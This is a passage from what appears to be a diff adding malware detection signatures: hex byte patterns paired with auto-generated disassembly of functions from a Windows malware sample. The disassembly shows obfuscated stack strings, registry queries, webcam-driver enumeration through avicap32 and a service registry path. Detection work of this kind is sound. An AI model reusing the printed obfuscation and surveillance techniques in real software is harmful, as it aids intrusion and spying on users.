?? 5C C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 00 FF D6 8B 84 24 ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 54 24 ?? 51 52 FF 15 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 8B BC 24 ?? ?? ?? ?? 6A 00 57 FF 15 ?? ?? ?? ?? 50 8B 84 24 ?? ?? ?? ?? 57 6A 01 50 8D 4C 24 ?? 51 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 1C 6A 00 FF D6 5F 5E 81 C4 28 04 00 00 C3 } + /* +Basic Block at 0x00404cd0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00404cd0 + .text:0x00404cd0 FUNC: int cdecl sub_00404cd0( ) [2 XREFS] + .text:0x00404cd0 + .text:0x00404cd0 Stack Variables: (offset from initial top of stack) + .text:0x00404cd0 -2: int local2 + .text:0x00404cd0 -3: int local3 + .text:0x00404cd0 -4: int local4 + .text:0x00404cd0 -5: int local5 + .text:0x00404cd0 -6: int local6 + .text:0x00404cd0 -7: int local7 + .text:0x00404cd0 -8: int local8 + .text:0x00404cd0 -9: int local9 + .text:0x00404cd0 -10: int local10 + .text:0x00404cd0 -11: int local11 + .text:0x00404cd0 -12: int local12 + .text:0x00404cd0 -13: int local13 + .text:0x00404cd0 -14: int local14 + .text:0x00404cd0 -15: int local15 + .text:0x00404cd0 -16: int local16 + .text:0x00404cd0 -17: int local17 + .text:0x00404cd0 -18: int local18 + .text:0x00404cd0 -19: int local19 + .text:0x00404cd0 -20: int local20 + .text:0x00404cd0 -21: int local21 + .text:0x00404cd0 -22: int local22 + .text:0x00404cd0 -23: int local23 + .text:0x00404cd0 -24: int local24 + .text:0x00404cd0 -25: int local25 + .text:0x00404cd0 -26: int local26 + .text:0x00404cd0 -27: int local27 + .text:0x00404cd0 -28: int local28 + .text:0x00404cd0 -29: int local29 + .text:0x00404cd0 -30: int local30 + .text:0x00404cd0 -31: int local31 + .text:0x00404cd0 -32: int local32 + .text:0x00404cd0 -33: int local33 + .text:0x00404cd0 -34: int local34 + .text:0x00404cd0 -35: int local35 + .text:0x00404cd0 -36: int local36 + .text:0x00404cd0 -37: int local37 + .text:0x00404cd0 -38: int local38 + .text:0x00404cd0 -39: int local39 + .text:0x00404cd0 -40: int local40 + .text:0x00404cd0 -41: int local41 + .text:0x00404cd0 -42: int local42 + .text:0x00404cd0 -43: int local43 + .text:0x00404cd0 -44: int local44 + .text:0x00404cd0 -45: int local45 + .text:0x00404cd0 -46: int local46 + .text:0x00404cd0 -47: int local47 + .text:0x00404cd0 -48: int local48 + .text:0x00404cd0 -52: int local52 + .text:0x00404cd0 -53: int local53 + .text:0x00404cd0 -54: int local54 + .text:0x00404cd0 -55: int local55 + .text:0x00404cd0 -56: int local56 + .text:0x00404cd0 -60: int local60 + .text:0x00404cd0 -64: int local64 + .text:0x00404cd0 -68: int local68 + .text:0x00404cd0 -72: int local72 + .text:0x00404cd0 + .text:0x00404cd0 83ec48 sub esp,72 + .text:0x00404cd3 53 push ebx + .text:0x00404cd4 b344 mov bl,68 + .text:0x00404cd6 b145 mov cl,69 + .text:0x00404cd8 885c241f mov byte [esp + 31],bl + .text:0x00404cdc 885c2425 mov byte [esp + 37],bl + .text:0x00404ce0 884c2423 mov byte [esp + 35],cl + .text:0x00404ce4 884c2426 mov byte [esp + 38],cl + .text:0x00404ce8 b353 mov bl,83 + .text:0x00404cea b804000000 mov eax,4 + .text:0x00404cef b149 mov cl,73 + .text:0x00404cf1 885c2427 mov byte [esp + 39],bl + .text:0x00404cf5 885c2431 mov byte [esp + 49],bl + .text:0x00404cf9 89442408 mov dword [esp + 8],eax + .text:0x00404cfd 8944240c mov dword [esp + 12],eax + .text:0x00404d01 884c242a mov byte [esp + 42],cl + .text:0x00404d05 884c242d mov byte [esp + 45],cl + .text:0x00404d09 b373 mov bl,115 + .text:0x00404d0b b041 mov al,65 + .text:0x00404d0d b252 mov dl,82 + .text:0x00404d0f b174 mov cl,116 + .text:0x00404d11 885c2433 mov byte [esp + 51],bl + .text:0x00404d15 885c2444 mov byte [esp + 68],bl + .text:0x00404d19 885c2445 mov byte [esp + 69],bl + .text:0x00404d1d 8844241d mov byte [esp + 29],al + .text:0x00404d21 8854241e mov byte [esp + 30],dl + .text:0x00404d25 88442421 mov byte [esp + 33],al + .text:0x00404d29 88542422 mov byte [esp + 34],dl + .text:0x00404d2d 88542429 mov byte [esp + 41],dl + .text:0x00404d31 884c2434 mov byte [esp + 52],cl + .text:0x00404d35 884c243b mov byte [esp + 59],cl + .text:0x00404d39 33db xor ebx,ebx + .text:0x00404d3b 56 push esi + .text:0x00404d3c 8b3578904000 mov esi,dword [0x00409078] + .text:0x00404d42 b05c mov al,92 + .text:0x00404d44 b265 mov dl,101 + .text:0x00404d46 b172 mov cl,114 + .text:0x00404d48 53 push ebx + .text:0x00404d49 c644242448 mov byte [esp + 36],72 + .text:0x00404d4e c644242857 mov byte [esp + 40],87 + .text:0x00404d53 8844242c mov byte [esp + 44],al + .text:0x00404d57 c644243043 mov byte [esp + 48],67 + .text:0x00404d5c c644243350 mov byte [esp + 51],80 + .text:0x00404d61 c644243454 mov byte [esp + 52],84 + .text:0x00404d66 c64424364f mov byte [esp + 54],79 + .text:0x00404d6b c64424374e mov byte [esp + 55],78 + .text:0x00404d70 88442438 mov byte [esp + 56],al + .text:0x00404d74 c644243a79 mov byte [esp + 58],121 + .text:0x00404d79 8854243d mov byte [esp + 61],dl + .text:0x00404d7d c644243e6d mov byte [esp + 62],109 + .text:0x00404d82 8844243f mov byte [esp + 63],al + .text:0x00404d86 c644244043 mov byte [esp + 64],67 + .text:0x00404d8b 88542441 mov byte [esp + 65],dl + .text:0x00404d8f c64424426e mov byte [esp + 66],110 + .text:0x00404d94 884c2444 mov byte [esp + 68],cl + .text:0x00404d98 c644244561 mov byte [esp + 69],97 + .text:0x00404d9d c64424466c mov byte [esp + 70],108 + .text:0x00404da2 c644244750 mov byte [esp + 71],80 + .text:0x00404da7 884c2448 mov byte [esp + 72],cl + .text:0x00404dab c64424496f mov byte [esp + 73],111 + .text:0x00404db0 c644244a63 mov byte [esp + 74],99 + .text:0x00404db5 8854244b mov byte [esp + 75],dl + .text:0x00404db9 c644244e6f mov byte [esp + 78],111 + .text:0x00404dbe 884c244f mov byte [esp + 79],cl + .text:0x00404dc2 88442450 mov byte [esp + 80],al + .text:0x00404dc6 c644245130 mov byte [esp + 81],48 + .text:0x00404dcb 885c2452 mov byte [esp + 82],bl + .text:0x00404dcf ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404dd1 8d442408 lea eax,dword [esp + 8] + .text:0x00404dd5 8d4c2420 lea ecx,dword [esp + 32] + .text:0x00404dd9 50 push eax + .text:0x00404dda 51 push ecx + .text:0x00404ddb 6802000080 push 0x80000002 + .text:0x00404de0 ff1520904000 call dword [0x00409020] ;advapi32.RegOpenKeyA(0x80000002,local48,local72) + .text:0x00404de6 53 push ebx + .text:0x00404de7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404de9 c64424187e mov byte [esp + 24],126 + .text:0x00404dee c64424194d mov byte [esp + 25],77 + .text:0x00404df3 c644241a48 mov byte [esp + 26],72 + .text:0x00404df8 c644241b7a mov byte [esp + 27],122 + .text:0x00404dfd 885c241c mov byte [esp + 28],bl + .text:0x00404e01 53 push ebx + .text:0x00404e02 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404e04 8d54240c lea edx,dword [esp + 12] + .text:0x00404e08 8d442414 lea eax,dword [esp + 20] + .text:0x00404e0c 52 push edx + .text:0x00404e0d 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00404e11 50 push eax + .text:0x00404e12 8b442410 mov eax,dword [esp + 16] + .text:0x00404e16 51 push ecx + .text:0x00404e17 8d542424 lea edx,dword [esp + 36] + .text:0x00404e1b 53 push ebx + .text:0x00404e1c 52 push edx + .text:0x00404e1d 50 push eax + .text:0x00404e1e ff1508904000 call dword [0x00409008] ;advapi32.RegQueryValueExA(0xfefefefe,local56,0,local64,local60,local68) + .text:0x00404e24 53 push ebx + .text:0x00404e25 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404e27 8b4c2408 mov ecx,dword [esp + 8] + .text:0x00404e2b 51 push ecx + .text:0x00404e2c ff150c904000 call dword [0x0040900c] ;advapi32.RegCloseKey(0xfefefefe) + .text:0x00404e32 53 push ebx + .text:0x00404e33 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404e35 8b442414 mov eax,dword [esp + 20] + .text:0x00404e39 5e pop esi + .text:0x00404e3a 5b pop ebx + .text:0x00404e3b 83c448 add esp,72 + .text:0x00404e3e c3 ret + */ + $c2 = { 83 EC 48 53 B3 44 B1 45 88 5C 24 ?? 88 5C 24 ?? 88 4C 24 ?? 88 4C 24 ?? B3 53 B8 04 00 00 00 B1 49 88 5C 24 ?? 88 5C 24 ?? 89 44 24 ?? 89 44 24 ?? 88 4C 24 ?? 88 4C 24 ?? B3 73 B0 41 B2 52 B1 74 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 44 24 ?? 88 54 24 ?? 88 44 24 ?? 88 54 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 4C 24 ?? 33 DB 56 8B 35 ?? ?? ?? ?? B0 5C B2 65 B1 72 53 C6 44 24 ?? 48 C6 44 24 ?? 57 88 44 24 ?? C6 44 24 ?? 43 C6 44 24 ?? 50 C6 44 24 ?? 54 C6 44 24 ?? 4F C6 44 24 ?? 4E 88 44 24 ?? C6 44 24 ?? 79 88 54 24 ?? C6 44 24 ?? 6D 88 44 24 ?? C6 44 24 ?? 43 88 54 24 ?? C6 44 24 ?? 6E 88 4C 24 ?? C6 44 24 ?? 61 C6 44 24 ?? 6C C6 44 24 ?? 50 88 4C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 63 88 54 24 ?? C6 44 24 ?? 6F 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 30 88 5C 24 ?? FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 68 02 00 00 80 FF 15 ?? ?? ?? ?? 53 FF D6 C6 44 24 ?? 7E C6 44 24 ?? 4D C6 44 24 ?? 48 C6 44 24 ?? 7A 88 5C 24 ?? 53 FF D6 8D 54 24 ?? 8D 44 24 ?? 52 8D 4C 24 ?? 50 8B 44 24 ?? 51 8D 54 24 ?? 53 52 50 FF 15 ?? ?? ?? ?? 53 FF D6 8B 4C 24 ?? 51 FF 15 ?? ?? ?? ?? 53 FF D6 8B 44 24 ?? 5E 5B 83 C4 48 C3 } + /* +Basic Block at 0x00404e40@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00404e40 + .text:0x00404e40 FUNC: int cdecl sub_00404e40( ) [2 XREFS] + .text:0x00404e40 + .text:0x00404e40 Stack Variables: (offset from initial top of stack) + .text:0x00404e40 -100: int local100 + .text:0x00404e40 -152: int local152 + .text:0x00404e40 -156: int local156 + .text:0x00404e40 -157: int local157 + .text:0x00404e40 -158: int local158 + .text:0x00404e40 -159: int local159 + .text:0x00404e40 -160: int local160 + .text:0x00404e40 -161: int local161 + .text:0x00404e40 -162: int local162 + .text:0x00404e40 -163: int local163 + .text:0x00404e40 -164: int local164 + .text:0x00404e40 -165: int local165 + .text:0x00404e40 -166: int local166 + .text:0x00404e40 -167: int local167 + .text:0x00404e40 -168: int local168 + .text:0x00404e40 -169: int local169 + .text:0x00404e40 -170: int local170 + .text:0x00404e40 -171: int local171 + .text:0x00404e40 -172: int local172 + .text:0x00404e40 -173: int local173 + .text:0x00404e40 -174: int local174 + .text:0x00404e40 -175: int local175 + .text:0x00404e40 -176: int local176 + .text:0x00404e40 -177: int local177 + .text:0x00404e40 -178: int local178 + .text:0x00404e40 -179: int local179 + .text:0x00404e40 -180: int local180 + .text:0x00404e40 -184: int local184 + .text:0x00404e40 -185: int local185 + .text:0x00404e40 -186: int local186 + .text:0x00404e40 -187: int local187 + .text:0x00404e40 -188: int local188 + .text:0x00404e40 -189: int local189 + .text:0x00404e40 -190: int local190 + .text:0x00404e40 -191: int local191 + .text:0x00404e40 -192: int local192 + .text:0x00404e40 -193: int local193 + .text:0x00404e40 -194: int local194 + .text:0x00404e40 -195: int local195 + .text:0x00404e40 -196: int local196 + .text:0x00404e40 + .text:0x00404e40 81ecc4000000 sub esp,196 + .text:0x00404e46 53 push ebx + .text:0x00404e47 55 push ebp + .text:0x00404e48 8b2d78904000 mov ebp,dword [0x00409078] + .text:0x00404e4e 56 push esi + .text:0x00404e4f b06c mov al,108 + .text:0x00404e51 57 push edi + .text:0x00404e52 33ff xor edi,edi + .text:0x00404e54 8844241a mov byte [esp + 26],al + .text:0x00404e58 8844241b mov byte [esp + 27],al + .text:0x00404e5c b341 mov bl,65 + .text:0x00404e5e b265 mov dl,101 + .text:0x00404e60 b172 mov cl,114 + .text:0x00404e62 b069 mov al,105 + .text:0x00404e64 57 push edi + .text:0x00404e65 885c2414 mov byte [esp + 20],bl + .text:0x00404e69 c644241556 mov byte [esp + 21],86 + .text:0x00404e6e c644241649 mov byte [esp + 22],73 + .text:0x00404e73 c644241743 mov byte [esp + 23],67 + .text:0x00404e78 885c2418 mov byte [esp + 24],bl + .text:0x00404e7c c644241950 mov byte [esp + 25],80 + .text:0x00404e81 c644241a33 mov byte [esp + 26],51 + .text:0x00404e86 c644241b32 mov byte [esp + 27],50 + .text:0x00404e8b c644241c2e mov byte [esp + 28],46 + .text:0x00404e90 c644241d64 mov byte [esp + 29],100 + .text:0x00404e95 c644242000 mov byte [esp + 32],0 + .text:0x00404e9a c644242463 mov byte [esp + 36],99 + .text:0x00404e9f c644242561 mov byte [esp + 37],97 + .text:0x00404ea4 c644242670 mov byte [esp + 38],112 + .text:0x00404ea9 c644242747 mov byte [esp + 39],71 + .text:0x00404eae 88542428 mov byte [esp + 40],dl + .text:0x00404eb2 c644242974 mov byte [esp + 41],116 + .text:0x00404eb7 c644242a44 mov byte [esp + 42],68 + .text:0x00404ebc 884c242b mov byte [esp + 43],cl + .text:0x00404ec0 8844242c mov byte [esp + 44],al + .text:0x00404ec4 c644242d76 mov byte [esp + 45],118 + .text:0x00404ec9 8854242e mov byte [esp + 46],dl + .text:0x00404ecd 884c242f mov byte [esp + 47],cl + .text:0x00404ed1 c644243044 mov byte [esp + 48],68 + .text:0x00404ed6 88542431 mov byte [esp + 49],dl + .text:0x00404eda c644243273 mov byte [esp + 50],115 + .text:0x00404edf c644243363 mov byte [esp + 51],99 + .text:0x00404ee4 884c2434 mov byte [esp + 52],cl + .text:0x00404ee8 88442435 mov byte [esp + 53],al + .text:0x00404eec c644243670 mov byte [esp + 54],112 + .text:0x00404ef1 c644243774 mov byte [esp + 55],116 + .text:0x00404ef6 88442438 mov byte [esp + 56],al + .text:0x00404efa c64424396f mov byte [esp + 57],111 + .text:0x00404eff c644243a6e mov byte [esp + 58],110 + .text:0x00404f04 885c243b mov byte [esp + 59],bl + .text:0x00404f08 c644243c00 mov byte [esp + 60],0 + .text:0x00404f0d ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00404f0f 8d442420 lea eax,dword [esp + 32] + .text:0x00404f13 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00404f17 50 push eax + .text:0x00404f18 51 push ecx + .text:0x00404f19 ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(local196) + .text:0x00404f1f 50 push eax + .text:0x00404f20 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(avicap32,local180) + .text:0x00404f26 8bd8 mov ebx,eax + .text:0x00404f28 33f6 xor esi,esi + */ + $c3 = { 81 EC C4 00 00 00 53 55 8B 2D ?? ?? ?? ?? 56 B0 6C 57 33 FF 88 44 24 ?? 88 44 24 ?? B3 41 B2 65 B1 72 B0 69 57 88 5C 24 ?? C6 44 24 ?? 56 C6 44 24 ?? 49 C6 44 24 ?? 43 88 5C 24 ?? C6 44 24 ?? 50 C6 44 24 ?? 33 C6 44 24 ?? 32 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 00 C6 44 24 ?? 63 C6 44 24 ?? 61 C6 44 24 ?? 70 C6 44 24 ?? 47 88 54 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 44 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 76 88 54 24 ?? 88 4C 24 ?? C6 44 24 ?? 44 88 54 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 63 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 70 C6 44 24 ?? 74 88 44 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 6E 88 5C 24 ?? C6 44 24 ?? 00 FF D5 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 33 F6 } + /* +Basic Block at 0x00404f60@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00404f60 + .text:0x00404f60 FUNC: int cdecl sub_00404f60( int arg0, int arg1, int arg2, int arg3, ) [8 XREFS] + .text:0x00404f60 + .text:0x00404f60 Stack Variables: (offset from initial top of stack) + .text:0x00404f60 16: int arg3 + .text:0x00404f60 12: int arg2 + .text:0x00404f60 8: int arg1 + .text:0x00404f60 4: int arg0 + .text:0x00404f60 -1023: int local1023 + .text:0x00404f60 -1024: int local1024 + .text:0x00404f60 -1028: int local1028 + .text:0x00404f60 -1029: int local1029 + .text:0x00404f60 -1030: int local1030 + .text:0x00404f60 -1031: int local1031 + .text:0x00404f60 -1032: int local1032 + .text:0x00404f60 -1033: int local1033 + .text:0x00404f60 -1034: int local1034 + .text:0x00404f60 -1035: int local1035 + .text:0x00404f60 -1036: int local1036 + .text:0x00404f60 -1037: int local1037 + .text:0x00404f60 -1038: int local1038 + .text:0x00404f60 -1039: int local1039 + .text:0x00404f60 -1040: int local1040 + .text:0x00404f60 -1041: int local1041 + .text:0x00404f60 -1042: int local1042 + .text:0x00404f60 -1043: int local1043 + .text:0x00404f60 -1044: int local1044 + .text:0x00404f60 -1045: int local1045 + .text:0x00404f60 -1046: int local1046 + .text:0x00404f60 -1047: int local1047 + .text:0x00404f60 -1048: int local1048 + .text:0x00404f60 -1049: int local1049 + .text:0x00404f60 -1050: int local1050 + .text:0x00404f60 -1051: int local1051 + .text:0x00404f60 -1052: int local1052 + .text:0x00404f60 -1053: int local1053 + .text:0x00404f60 -1054: int local1054 + .text:0x00404f60 -1055: int local1055 + .text:0x00404f60 -1056: int local1056 + .text:0x00404f60 -1057: int local1057 + .text:0x00404f60 -1058: int local1058 + .text:0x00404f60 -1059: int local1059 + .text:0x00404f60 -1060: int local1060 + .text:0x00404f60 -1061: int local1061 + .text:0x00404f60 -1062: int local1062 + .text:0x00404f60 -1063: int local1063 + .text:0x00404f60 -1064: int local1064 + .text:0x00404f60 + .text:0x00404f60 81ec28040000 sub esp,1064 + .text:0x00404f66 53 push ebx + .text:0x00404f67 55 push ebp + .text:0x00404f68 56 push esi + .text:0x00404f69 8b3578904000 mov esi,dword [0x00409078] + .text:0x00404f6f 57 push edi + .text:0x00404f70 6a00 push 0 + .text:0x00404f72 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f74 6a00 push 0 + .text:0x00404f76 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f78 b9ff000000 mov ecx,255 + .text:0x00404f7d 33c0 xor eax,eax + .text:0x00404f7f 8d7c2439 lea edi,dword [esp + 57] + .text:0x00404f83 c644243800 mov byte [esp + 56],0 + .text:0x00404f88 f3ab rep: stosd + .text:0x00404f8a 66ab stosd + .text:0x00404f8c 6a00 push 0 + .text:0x00404f8e aa stosb + .text:0x00404f8f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f91 6a00 push 0 + .text:0x00404f93 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f95 6a00 push 0 + .text:0x00404f97 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f99 8bac2448040000 mov ebp,dword [esp + 1096] + .text:0x00404fa0 8b9c2444040000 mov ebx,dword [esp + 1092] + .text:0x00404fa7 8bcd mov ecx,ebp + .text:0x00404fa9 33c0 xor eax,eax + .text:0x00404fab 8bd1 mov edx,ecx + .text:0x00404fad 8bfb mov edi,ebx + .text:0x00404faf c1e902 shr ecx,2 + .text:0x00404fb2 f3ab rep: stosd + .text:0x00404fb4 8bca mov ecx,edx + .text:0x00404fb6 6a00 push 0 + .text:0x00404fb8 83e103 and ecx,3 + .text:0x00404fbb f3aa rep: stosb + .text:0x00404fbd ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404fbf b900010000 mov ecx,256 + .text:0x00404fc4 33c0 xor eax,eax + .text:0x00404fc6 8d7c2438 lea edi,dword [esp + 56] + .text:0x00404fca 50 push eax + .text:0x00404fcb f3ab rep: stosd + .text:0x00404fcd ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404fcf b065 mov al,101 + .text:0x00404fd1 b253 mov dl,83 + .text:0x00404fd3 8844241b mov byte [esp + 27],al + .text:0x00404fd7 88442426 mov byte [esp + 38],al + .text:0x00404fdb 8844242a mov byte [esp + 42],al + .text:0x00404fdf 8844242f mov byte [esp + 47],al + .text:0x00404fe3 b172 mov cl,114 + .text:0x00404fe5 b073 mov al,115 + .text:0x00404fe7 88542410 mov byte [esp + 16],dl + .text:0x00404feb c644241159 mov byte [esp + 17],89 + .text:0x00404ff0 88542412 mov byte [esp + 18],dl + .text:0x00404ff4 c644241354 mov byte [esp + 19],84 + .text:0x00404ff9 c644241445 mov byte [esp + 20],69 + .text:0x00404ffe c64424154d mov byte [esp + 21],77 + .text:0x00405003 c64424165c mov byte [esp + 22],92 + .text:0x00405008 c644241743 mov byte [esp + 23],67 + .text:0x0040500d c644241875 mov byte [esp + 24],117 + .text:0x00405012 884c2419 mov byte [esp + 25],cl + .text:0x00405016 884c241a mov byte [esp + 26],cl + .text:0x0040501a c644241c6e mov byte [esp + 28],110 + .text:0x0040501f c644241d74 mov byte [esp + 29],116 + .text:0x00405024 c644241e43 mov byte [esp + 30],67 + .text:0x00405029 c644241f6f mov byte [esp + 31],111 + .text:0x0040502e c64424206e mov byte [esp + 32],110 + .text:0x00405033 c644242174 mov byte [esp + 33],116 + .text:0x00405038 884c2422 mov byte [esp + 34],cl + .text:0x0040503c c64424236f mov byte [esp + 35],111 + .text:0x00405041 c64424246c mov byte [esp + 36],108 + .text:0x00405046 88542425 mov byte [esp + 37],dl + .text:0x0040504a c644242774 mov byte [esp + 39],116 + .text:0x0040504f c64424285c mov byte [esp + 40],92 + .text:0x00405054 88542429 mov byte [esp + 41],dl + .text:0x00405058 884c242b mov byte [esp + 43],cl + .text:0x0040505c c644242c76 mov byte [esp + 44],118 + .text:0x00405061 c644242d69 mov byte [esp + 45],105 + .text:0x00405066 c644242e63 mov byte [esp + 46],99 + .text:0x0040506b 88442430 mov byte [esp + 48],al + .text:0x0040506f c64424315c mov byte [esp + 49],92 + .text:0x00405074 c644243225 mov byte [esp + 50],37 + .text:0x00405079 88442433 mov byte [esp + 51],al + .text:0x0040507d 6a00 push 0 + .text:0x0040507f c644243800 mov byte [esp + 56],0 + .text:0x00405084 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405086 6a00 push 0 + .text:0x00405088 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040508a 6a00 push 0 + .text:0x0040508c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040508e 6a00 push 0 + .text:0x00405090 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405092 6a00 push 0 + .text:0x00405094 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405096 8b84243c040000 mov eax,dword [esp + 1084] + .text:0x0040509d 8d4c2410 lea ecx,dword [esp + 16] + .text:0x004050a1 50 push eax + .text:0x004050a2 8d54243c lea edx,dword [esp + 60] + .text:0x004050a6 51 push ecx + .text:0x004050a7 52 push edx + .text:0x004050a8 ff15d8914000 call dword [0x004091d8] ;user32.wsprintfA(local1024,local1064) + .text:0x004050ae 83c40c add esp,12 + .text:0x004050b1 6a00 push 0 + .text:0x004050b3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004050b5 6a00 push 0 + .text:0x004050b7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004050b9 8b842440040000 mov eax,dword [esp + 1088] + .text:0x004050c0 6a00 push 0 + .text:0x004050c2 55 push ebp + .text:0x004050c3 6a00 push 0 + .text:0x004050c5 53 push ebx + .text:0x004050c6 6a01 push 1 + .text:0x004050c8 8d4c244c lea ecx,dword [esp + 76] + .text:0x004050cc 50 push eax + .text:0x004050cd 51 push ecx + .text:0x004050ce 6802000080 push 0x80000002 + .text:0x004050d3 e8b8f9ffff call 0x00404a90 ;sub_00404a90(0x80000002,local1024,arg1,1,arg2,0,arg3,0) + .text:0x004050d8 83c420 add esp,32 + .text:0x004050db 6a00 push 0 + .text:0x004050dd ffd6 call esi ;kernel32.Sleep(0) + .text:0x004050df 5f pop edi + .text:0x004050e0 5e pop esi + .text:0x004050e1 5d pop ebp + .text:0x004050e2 5b pop ebx + .text:0x004050e3 81c428040000 add esp,1064 + .text:0x004050e9 c3 ret + */ + $c4 = { 81 EC 28 04 00 00 53 55 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 6A 00 FF D6 B9 FF 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 66 AB 6A 00 AA FF D6 6A 00 FF D6 6A 00 FF D6 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 8B CD 33 C0 8B D1 8B FB C1 E9 02 F3 AB 8B CA 6A 00 83 E1 03 F3 AA FF D6 B9 00 01 00 00 33 C0 8D 7C 24 ?? 50 F3 AB FF D6 B0 65 B2 53 88 44 24 ?? 88 44 24 ?? 88 44 24 ?? 88 44 24 ?? B1 72 B0 73 88 54 24 ?? C6 44 24 ?? 59 88 54 24 ?? C6 44 24 ?? 54 C6 44 24 ?? 45 C6 44 24 ?? 4D C6 44 24 ?? 5C C6 44 24 ?? 43 C6 44 24 ?? 75 88 4C 24 ?? 88 4C 24 ?? C6 44 24 ?? 6E C6 44 24 ?? 74 C6 44 24 ?? 43 C6 44 24 ?? 6F C6 44 24 ?? 6E C6 44 24 ?? 74 88 4C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 6C 88 54 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 5C 88 54 24 ?? 88 4C 24 ?? C6 44 24 ?? 76 C6 44 24 ?? 69 C6 44 24 ?? 63 88 44 24 ?? C6 44 24 ?? 5C C6 44 24 ?? 25 88 44 24 ?? 6A 00 C6 44 24 ?? 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 54 24 ?? 51 52 FF 15 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 6A 00 55 6A 00 53 6A 01 8D 4C 24 ?? 50 51 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 20 6A 00 FF D6 5F 5E 5D 5B 81 C4 28 04 00 00 C3 } + /* +Basic Block at 0x004056e0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x004056e0 + .text:0x004056e0 FUNC: int cdecl sub_004056e0( int arg0, int arg1, ) [2 XREFS] + .text:0x004056e0 + .text:0x004056e0 Stack Variables: (offset from initial top of stack) + .text:0x004056e0 8: int arg1 + .text:0x004056e0 4: int arg0 + .text:0x004056e0 -3: int local3 + .text:0x004056e0 -4: int local4 + .text:0x004056e0 -5: int local5 + .text:0x004056e0 -6: int local6 + .text:0x004056e0 -7: int local7 + .text:0x004056e0 -8: int local8 + .text:0x004056e0 -9: int local9 + .text:0x004056e0 -10: int local10 + .text:0x004056e0 -11: int local11 + .text:0x004056e0 -12: int local12 + .text:0x004056e0 -13: int local13 + .text:0x004056e0 -14: int local14 + .text:0x004056e0 -15: int local15 + .text:0x004056e0 -16: int local16 + .text:0x004056e0 -17: int local17 + .text:0x004056e0 -18: int local18 + .text:0x004056e0 -19: int local19 + .text:0x004056e0 -20: int local20 + .text:0x004056e0 -21: int local21 + .text:0x004056e0 -22: int local22 + .text:0x004056e0 -23: int local23 + .text:0x004056e0 -24: int local24 + .text:0x004056e0 -25: int local25 + .text:0x004056e0 -26: int local26 + .text:0x004056e0 -27: int local27 + .text:0x004056e0 -28: int local28 + .text:0x004056e0 -29: int local29 + .text:0x004056e0 -30: int local30 + .text:0x004056e0 -31: int local31 + .text:0x004056e0 -32: int local32 + .text:0x004056e0 -33: int local33 + .text:0x004056e0 -34: int local34 + .text:0x004056e0 -35: int local35 + .text:0x004056e0 -36: int local36 + .text:0x004056e0 -37: int local37 + .text:0x004056e0 -38: int local38 + .text:0x004056e0 -39: int local39 + .text:0x004056e0 -40: int local40 + .text:0x004056e0 -41: int local41 + .text:0x004056e0 -42: int local42 + .text:0x004056e0 -43: int local43 + .text:0x004056e0 -44: int local44 + .text:0x004056e0 -45: int local45 + .text:0x004056e0 -46: int local46 + .text:0x004056e0 -47: int local47 + .text:0x004056e0 -48: int local48 + .text:0x004056e0 + .text:0x004056e0 83ec30 sub esp,48 + .text:0x004056e3 53 push ebx + .text:0x004056e4 b057 mov al,87 + .text:0x004056e6 56 push esi + .text:0x004056e7 8b742440 mov esi,dword [esp + 64] + .text:0x004056eb b16f mov cl,111 + .text:0x004056ed 8844240c mov byte [esp + 12],al + .text:0x004056f1 8844241b mov byte [esp + 27],al + 